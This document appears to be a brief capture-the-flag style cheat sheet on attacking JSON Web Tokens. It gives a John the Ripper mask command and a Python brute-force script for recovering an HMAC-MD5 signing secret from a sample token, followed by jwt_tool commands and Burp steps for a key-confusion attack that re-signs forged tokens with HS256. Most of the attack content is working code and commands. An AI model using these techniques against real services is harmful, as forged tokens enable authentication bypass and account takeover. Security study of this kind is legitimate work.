JWT
MD5_HMAC
Easy way
john --mask=fsrwjcfszeg?l?l?l?l?l --format=HMAC-MD5 jwt.txt Hard way
import base64
import hashlib
import hmac
import json
def remove_padding(encoded_string):
return encoded_string.rstrip("=")
def jwt_creator(secret_key):
encoded_header = 'eyJhbGciOiJNRDVfSE1BQyJ9'
encoded_payload = 'eyJ1c2VybmFtZSI6InMifQ'
encoded_token = encoded_header + "." + encoded_payload
signature = hmac.new(secret_key.encode("utf-8"), encoded_token.encode("utf-8"), hashlib.md5).digest()
encoded_signature = remove_padding(base64.urlsafe_b64encode(signature).decode("utf-8"))
jwt_token = encoded_token + "." + encoded_signature
return jwt_token
original_jwt = 'eyJhbGciOiJNRDVfSE1BQyJ9.eyJ1c2VybmFtZSI6InMifQ.49BQc1Pj96LW8tUhAHXzYA'
permutations_file = 'permutations.txt'
secret_found = None
### Code to generate the permutations ###
#import itertools
#characters = 'abcdefghijklmnopqrstuvwxyz'
#permutations = itertools.product(characters, 5)
#with open('permutations.txt', 'w') as file:
# for perm in permutations:
# line = 'fsrwjcfszeg' + ''.join(perm) + '\n'
# file.write(line)
##########################################
with open(permutations_file, 'r') as f:
for line in f:
secret_key = line.strip()
token = jwt_creator(secret_key)
print(token)
if token == original_jwt:
secret_found = secret_key
break
if secret_found:
print("Found secret: " + secret_found)
else:
print("No matching secret found.")Key Confusion attack
Generate a public key.
python3 jwt_tool.py JWT_TOKEN -X k -jw jwks.json -V
# OR
python3 jwt_tool.py JWT_TOKEN -X k -pk public.pem -VBase64 encode the public key
cat kid_0_1694791448.pem | base64 -w 0 | cNow generate a new symmetric key using burpsuite jwt editor
Now click on sign and select the new generated symmetric key
Finally change the algorithm in the alg header to HS256 and change the body to your needs
References:
Last updated